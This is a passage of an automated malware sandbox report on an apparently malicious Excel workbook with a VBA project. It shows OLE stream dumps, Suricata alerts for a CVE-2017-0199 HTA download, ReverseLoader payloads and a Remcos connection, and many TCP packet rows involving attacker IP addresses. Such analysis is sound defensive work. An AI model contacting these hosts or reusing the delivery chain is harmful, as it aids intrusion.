                                                                                                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:2644
                                                                                                            Entropy:3.9968958958419494
                                                                                                            Base64 Encoded:False
                                                                                                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                                                                            General
                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                            CLSID:
                                                                                                            File Type:data
                                                                                                            Stream Size:553
                                                                                                            Entropy:6.3732013600446
                                                                                                            Base64 Encoded:True
                                                                                                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . O O i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                                                                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 4f dd 4f 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-11-20T16:57:16.955138+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1192.3.220.2980192.168.2.2249175TCP
                                                                                                            2024-11-20T16:57:16.955138+01002057635ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound1192.3.220.2980192.168.2.2249178TCP
                                                                                                            2024-11-20T16:57:16.955138+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1192.3.220.2980192.168.2.2249178TCP
                                                                                                            2024-11-20T16:57:16.955138+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1192.3.220.2980192.168.2.2249175TCP
                                                                                                            2024-11-20T16:57:20.442035+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164192.3.220.2980TCP
                                                                                                            2024-11-20T16:57:20.567470+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.2980192.168.2.2249164TCP
                                                                                                            2024-11-20T16:57:26.891127+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249166192.3.220.2980TCP
                                                                                                            2024-11-20T16:57:26.891141+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)1192.3.220.2980192.168.2.2249166TCP
                                                                                                            2024-11-20T16:57:36.883221+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.2249167192.3.220.2980TCP
                                                                                                            2024-11-20T16:57:52.360798+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.2249168TCP
                                                                                                            2024-11-20T16:57:55.899830+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249173192.3.220.2980TCP
                                                                                                            2024-11-20T16:58:11.865687+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.2249175192.3.220.2980TCP
                                                                                                            2024-11-20T16:58:12.263546+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11192.3.220.2980192.168.2.2249175TCP
                                                                                                            2024-11-20T16:58:12.263546+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21192.3.220.2980192.168.2.2249175TCP
                                                                                                            2024-11-20T16:58:14.591521+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21142.215.209.78443192.168.2.2249174TCP
                                                                                                            2024-11-20T16:58:15.230868+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.2249176192.3.101.1496946TCP
                                                                                                            2024-11-20T16:58:19.031413+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.2249177178.237.33.5080TCP
                                                                                                            2024-11-20T16:58:29.247487+01002858796ETPRO MALWARE ReverseLoader Payload Request (GET) M11192.168.2.2249178192.3.220.2980TCP
                                                                                                            2024-11-20T16:58:29.669499+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11192.3.220.2980192.168.2.2249178TCP
                                                                                                            2024-11-20T16:58:29.669499+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21192.3.220.2980192.168.2.2249178TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 20, 2024 16:57:17.202338934 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:17.202382088 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:17.202513933 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:17.207766056 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:17.207779884 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:18.597129107 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:18.597407103 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:18.605155945 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:18.605179071 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:18.606232882 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:18.606368065 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:18.680944920 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:18.723340034 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.095139980 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.095263958 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:19.095276117 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.095396996 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.095479012 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:19.095479012 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:19.097162008 CET49163443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:19.097179890 CET44349163198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.102329016 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:19.223061085 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:19.223252058 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:19.223304987 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:19.344281912 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441879988 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441905975 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441920996 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441935062 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441943884 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441960096 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441976070 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.441989899 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.442006111 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.442023039 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.442034960 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.442079067 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.442080021 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.442080021 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.448702097 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.567470074 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.567589045 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.567874908 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.567920923 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.571609020 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.571671963 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.571748018 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.571794033 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.656559944 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.656586885 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.656634092 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.656668901 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.659997940 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.660039902 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.661722898 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.661768913 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.662476063 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.662517071 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.670268059 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.670433044 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.670624018 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.670669079 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.678472996 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.678520918 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.679378986 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.679415941 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.685937881 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.685957909 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.686000109 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.686016083 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.691345930 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.691400051 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.691440105 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.691479921 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.703686953 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.703772068 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.704951048 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.704998970 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.711965084 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.712018967 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.712449074 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.712491035 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.720244884 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.720319986 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.720727921 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.720787048 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.726011038 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.726047993 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.726098061 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.726119041 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.733371973 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.733447075 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.733634949 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.733772993 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.776412010 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.776506901 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.776668072 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.776717901 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.865726948 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.865751982 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.865788937 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.865819931 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.867969990 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.868019104 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.868422985 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.868462086 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.873781919 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.873827934 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.873924971 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.873965025 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.879539967 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.879592896 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.879967928 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.880009890 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.885498047 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.885565042 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.885751963 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.885792971 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.891170979 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.891232967 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.891474009 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.891510010 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.896995068 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.897080898 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.899202108 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.899251938 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.901407003 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.901451111 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.903841019 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.903892040 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.908592939 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.908679008 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.908710957 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.908756018 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.914413929 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.914483070 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.914872885 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.914913893 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.917716980 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.917773008 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.918214083 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.918261051 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.921626091 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.921695948 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.922065973 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.922100067 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.925182104 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.925240040 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.925852060 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.925892115 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.928879976 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.928937912 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.929156065 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.929194927 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.932485104 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.932538033 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.932631016 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.932670116 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.936156034 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.936172962 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:20.936213970 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:20.936230898 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:21.473665953 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:21.473721027 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:21.956907034 CET8049164192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:21.956954956 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.110717058 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.110739946 CET4916480192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:22.632076025 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.632169962 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:22.632266045 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.644815922 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:22.644869089 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.091696024 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.091780901 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.097614050 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.097642899 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.098162889 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.098226070 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.172058105 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.215339899 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614048004 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614139080 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:24.614276886 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.657990932 CET49165443192.168.2.22198.244.140.41
                                                                                                            Nov 20, 2024 16:57:24.658049107 CET44349165198.244.140.41192.168.2.22
                                                                                                            Nov 20, 2024 16:57:25.568459034 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.692059040 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:25.692131996 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.692431927 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:25.815664053 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.890983105 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891010046 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891022921 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891113043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891127110 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891140938 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891154051 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891166925 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891180038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891191959 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891204119 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:26.891290903 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.891292095 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.892702103 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:26.897555113 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.010790110 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.010862112 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.010864019 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.010946989 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.015068054 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.015121937 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.103904963 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.104008913 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.104314089 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.107947111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.108019114 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.108048916 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.108102083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.116266966 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.116373062 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.117398024 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.117436886 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.117470980 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.117507935 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.124914885 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.125015974 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.125127077 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.125185013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.136228085 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.136266947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.136311054 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.136311054 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.144565105 CET8049166192.3.220.29192.168.2.22
